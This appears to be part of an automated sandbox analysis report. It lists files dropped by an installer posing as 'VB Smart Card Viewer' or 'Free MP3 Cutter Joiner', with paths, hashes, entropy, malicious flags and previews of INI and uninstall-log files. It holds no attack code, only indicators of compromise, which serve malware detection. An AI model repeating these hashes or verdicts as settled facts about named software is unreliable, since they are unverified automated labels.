                                                                                                                                                                                                                                                                                                                                                                SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                                                                                                                                                                                                                                                                MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                                                                                                                                                                                                                                                                SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                                                                                                                                                                                                                                                                SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3188
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.820146923376414
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
                                                                                                                                                                                                                                                                                                                                                                MD5:0F16041A3EFE467EE8440060A5ED7F8A
                                                                                                                                                                                                                                                                                                                                                                SHA1:6FB9C518E8F468275B4C821DB8D1F64DEC787687
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
                                                                                                                                                                                                                                                                                                                                                                SHA-512:C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3188
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.820146923376414
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:r9BirQRr9DW1t0Y+6HcRMRBm8K+0vNZry19:Jk+9Ot0EcF8K+d19
                                                                                                                                                                                                                                                                                                                                                                MD5:0F16041A3EFE467EE8440060A5ED7F8A
                                                                                                                                                                                                                                                                                                                                                                SHA1:6FB9C518E8F468275B4C821DB8D1F64DEC787687
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C84D2F1177AAD5EA224C68F34DA0CD0C8E7308BA1CC93494B3376F52051FAC93
                                                                                                                                                                                                                                                                                                                                                                SHA-512:C362D7C35425DDA7F98CDD597F0CC1ED0510194022E5AB9AB8EC0EDCCDDD5D9214563C7D038A2A3A5FD103093074E6D3190CA374D838AA3DD4E78F75C9D2BDE3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..[.A.P.P.L.I.C.A.T.I.O.N.].....n.a.m.e.=.F.r.e.e. .M.P.3. .C.u.t.t.e.r. .J.o.i.n.e.r.....v.e.r.s.i.o.n.=.V.2.0.2.3...5.....u.r.l.=.h.t.t.p.s.:././.w.w.w...d.v.d.v.i.d.e.o.m.e.d.i.a...c.o.m./.h.o.w.-.t.o.-.c.u.t.-.m.p.3...h.t.m.l.....[.J.I.E.M.I.A.N.].....y.y.=.D.i.l. .S.e...i.m.i.....m.p.3.j.q.=.M.P.3. .K.e.s.i.c.i.....m.p.3.h.b.=.M.P.3. .B.i.r.l.e._.t.i.r.i.c.i.....k.s.j.q.=.B.a._.l.a.n.g.1... .N.o.k.t.a.s.1.:.:.....k.s.j.q.1.=.K.e.s.i.m. .B.a._.l.a.n.g.1.c.1.....j.s.j.q.=.B.i.t.i._. .N.o.k.t.a.s.1.:.....j.q.s.j.=.K.l.i.p. .S...r.e.s.i.:.....y.w.j.=.K.a.y.n.a.k.....k.s.s.j.=.S...r.e. .B.a._.1.....j.s.s.j.=.S...r.e. .S.o.n.u.....s.c.g.s.=...1.k.t.1. .B.i...i.m.i.....o.u.t.p.u.t.=...1.k.t.1. .D.o.s.y.a.s.1.:.....n.y.k.y.z.j.s.r.=.D.o...r.u.d.a.n. .d...z.e.n.l.e.m.e. .d.e.n.e.t.i.m.i. .g.i.r.i._.i. .y.a.p.1.l.a.c.a.k. .z.a.m.a.n. .b.i...i.m.i. .0.0.:.0.0.:.0.0...0.0.0.(.s.a.:.d.a.:.s.n...s.a.l.).....z.t.=.D.u.r.u.m.....z.b.=.H.a.z.1.r.....s.y.m.t.w.j.=.T...m. .S.e.s. .D.o.s.y.a.l.a.r.1.
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):105784
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.258144336244945
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                                                                                                                                                                                                                                                                MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                                                                                                                                                                                                                                                                SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):125637
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.2640431186303145
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                                                                                                                                                                                                                                                                MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                                                                                                                                                                                                                                                                SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1065100
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.300961775371533
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:gsRe/8fBAUZLYnwPKO6lbbTCpGavkg3NyeuQ6l9fHOfD:gzKBAUZLYwiO6UpGaXBuQQ9uD
                                                                                                                                                                                                                                                                                                                                                                MD5:B7DF9B43BF812DDAF60C99732C1AB273
                                                                                                                                                                                                                                                                                                                                                                SHA1:4A90353C8B2845008483854642B711E917F9CEEF
                                                                                                                                                                                                                                                                                                                                                                SHA-256:74024FE9B8A1E4F8B9B7561B336B2916A20784699CDEEF2948074F0E820C9BDE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:DB78A8AF90E8557BA37DF1B8C089B8C2E6D912CB08A7B633126541FA9A2E91A0DD90E275A83D323DB0E38BB464744225B0FD405A2C828170B5B7AC1333D6C6E7
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):40974
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.485702128133584
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                                                                                                                                                                                                                                                                MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                                                                                                                                                                                                                                                                SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                                                                                                                                                                                                                                                                SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                                                                                                                                                                                                                                                                SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):176200
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.647007817777345
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                                                                                                                                                                                                                                                                MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                                                                                                                                                                                                                                                                SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):555894
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4167624637949925
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:TnOHRuNruVRJ/RbM4YkuYFSwqFux5T8hac1eQ3RcMLQa9gKutRJhuusoAu3FsWVI:2z8wqux5TEacQmRcMcpfLnFQ
                                                                                                                                                                                                                                                                                                                                                                MD5:77A96C1C8E72D12BE4DFA5600A67E0F4
                                                                                                                                                                                                                                                                                                                                                                SHA1:F1A94189F7DA47DB26E332024C255AFAA085A654
                                                                                                                                                                                                                                                                                                                                                                SHA-256:E6A08981AB88E25B892DB826D75EBE4C3A9EC932704F722B3E32E5D9C8CD359C
                                                                                                                                                                                                                                                                                                                                                                SHA-512:267951B1CF2C745DA69265EEF7E921FF4A9F07C49000EB30D3C1793634C6AB61AB3A897E418A56C77C3F8F735AA2844FC6BF564DC2D88C9C0835A37A318AD52B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):68552
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1042544770100395
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                                                                                                                                                                                                                                                                MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                                                                                                                                                                                                                                                                SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                                                                                                                                                                                                                                                                SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):442
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8280681998470794
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12:Q+gZPiv77qlXS8lvlRFo1MonAUNycdlUlaT9SaG:Q+gZPo7GU0vlRq1pnAUNnd+gTAaG
                                                                                                                                                                                                                                                                                                                                                                MD5:09204E71E9F3B624E909FB20DEFE6EF5
                                                                                                                                                                                                                                                                                                                                                                SHA1:2374900EBB8D9BB7127217DAE828A949B8E7938B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:D0755838EFEF3A423FFF51C91B2AEC497EB6C1A2A845534D6918C433E1F95267
                                                                                                                                                                                                                                                                                                                                                                SHA-512:7B6FE24B112EED282D5795F0D2D122CC71539823609F1F3A7A5B3CAFEC8C86F00B310454B0CB607F881DBA99E7F2E55DD6EEDC31A3CC3D1F2B10FE43A923DE8F
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:..[.L.A.N.G.U.A.G.E.].....n.a.m.e.1.=.E.n.g.l.i.s.h.....n.a.m.e.2.=.E.s.p.a...o.l.....n.a.m.e.3.=.D.e.u.t.s.c.h.....n.a.m.e.4.=.F.r.a.n...a.i.s.....n.a.m.e.5.=.I.t.a.l.i.a.n.o.....n.a.m.e.6.=..e,g......n.a.m.e.7.=.M.a.g.y.a.r.....n.a.m.e.8.=.T...r.k.....n.a.m.e.9.=.'.D.9.1.(.J.).....n.a.m.e.1.0.=.R.o.m...n.......n.a.m.e.1.1.=.A~.-N.e....f.i.l.e.=.e.n.g.l.i.s.h...i.n.i.....[.P.A.T.H.].....n.a.m.e.=.D.:.\.....[.T.I.M.E.S.].....t.i.m.e.=.0.
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):129038
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.508174898498455
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:2n7B3zAWc/gG6IsRc+JdTCXw4hXAMpI3pr:2n7B3zAWc/SmXfAMK
                                                                                                                                                                                                                                                                                                                                                                MD5:3D8C24A40935FB27FC494FC6147E6EA8
                                                                                                                                                                                                                                                                                                                                                                SHA1:C26B6949C34AADB8271E124CE08F511BE5033A04
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F83401305ACDA249D2A81CD8496E08643686FF1327EE4A495A1F3ABD77C7C3E6
                                                                                                                                                                                                                                                                                                                                                                SHA-512:2EC272A4E770FB0B748ED3F3ED9E9A6983B2AB9B88D0C57C63E2248A1EF2B8D8A528EFAAD488CA377DBD05748DFA87DF086DDFA6B0DAD58571C47732320DC958
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:InnoSetup Log VB Smart Card Viewer, version 0x30, 5570 bytes, 138727\user, "C:\Users\user\AppData\Local\VB Smart Card Viewer"
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):5570
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.845283852339951
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:96:rEW4RjpmRJ97u+eOIhl6D7ICSss/Lnw04S:rEW4ZpmpHHIhYICSsAnw0N
                                                                                                                                                                                                                                                                                                                                                                MD5:266C64EA402368DEF71AA1A4E57DF5A1
                                                                                                                                                                                                                                                                                                                                                                SHA1:4A23879359110E83EAB039426DFED2AC535F6C3C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:849A0746E8A74738C3F859C0E6250575FAA4D249283E827B1CC41B0FE347EA72
                                                                                                                                                                                                                                                                                                                                                                SHA-512:42F7E30E8F3BEF2C127072B62B3FC859BE1BC67FB7E3573BFBC9A682C854A3E5FCA2E11A9C0753E91BD72271504E301A7E95E2A5468C66A0AC2CD4A0F7253E95
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Preview:Inno Setup Uninstall Log (b)....................................VB Smart Card Viewer............................................................................................................VB Smart Card Viewer............................................................................................................0...........%...............................................................................................................3...........2.......W....138727.user4C:\Users\user\AppData\Local\VB Smart Card Viewer............. .... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):720373
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.507181359300328
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjUR6FDExyFg:nu7eEYCP8trP837szHUA60SLtcV3E9fE
                                                                                                                                                                                                                                                                                                                                                                MD5:BBC68F2D9923F1E10C37703479C13301
                                                                                                                                                                                                                                                                                                                                                                SHA1:C017AF29745A24F7F74A535407C680A90B1AE5EC
                                                                                                                                                                                                                                                                                                                                                                SHA-256:F62D22F6611EED484B8363209949370E93D07DB172556E8AB853470D691F202A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:B6F534CD0BB6A5DC4DAEB21BF9BC219A7200AA25CBDF87F183571744EE24B4D2AE74911E7996B646934E99BF263C7459BAF8937B1E179441995D59B8B7D96189
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3047424
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.876980552165079
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:ubxuBXjA7pOxwz1HCBCvWV3BE1G89lHdXCkdC7EVUgKcAWg5t:exeYka7WVBEk89lHdXCkdQEdA
                                                                                                                                                                                                                                                                                                                                                                MD5:29DEB5EE2C07F1E8660E10AB6E4A0966
                                                                                                                                                                                                                                                                                                                                                                SHA1:CE8D68341F3A150E0AE4F26BCE649E505F766A5D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EC88B7D9AAB10E45DC4AC1AAFFA5D9DA9BF2E368580BDDF16F0DDE301E97B43F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4D3E6117EA337CA5902CC4E19C99C82A177AB889412E58BFF59B88B348D5589EA3AA10E48878C14DF80276C79FF43D6A15D893E1C53C9888FDD7BDD746D3435B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):127192
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.479927027421408
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:/fMTf09hjtHy4xaIqGpnuJY8KYA/hKjUR+YABqKBrnToIfqIOoIOGESvrTEgTWjx:XMA3Fa0sYDY6hKgRvwqOTBf4uGE+rYgE
                                                                                                                                                                                                                                                                                                                                                                MD5:8B2A6E8419A8A4E7D3FD023D97455FB9
                                                                                                                                                                                                                                                                                                                                                                SHA1:2547A1F94FB4F83B7C133A3E285EE11FAA155E84
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7087CDD1ACDFF6CD1B8D821388F430AF3888314B05A5821BB53E67034362F670
                                                                                                                                                                                                                                                                                                                                                                SHA-512:44438F6DD4BECABC2CB3053E2C42877CBDB0F309FE272F67A94AD530CAF1C5E5D49BC394F7D21C4226A4F0EB6D8661C5C7113508EA2F446E0DBEA0D59554D4A4
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
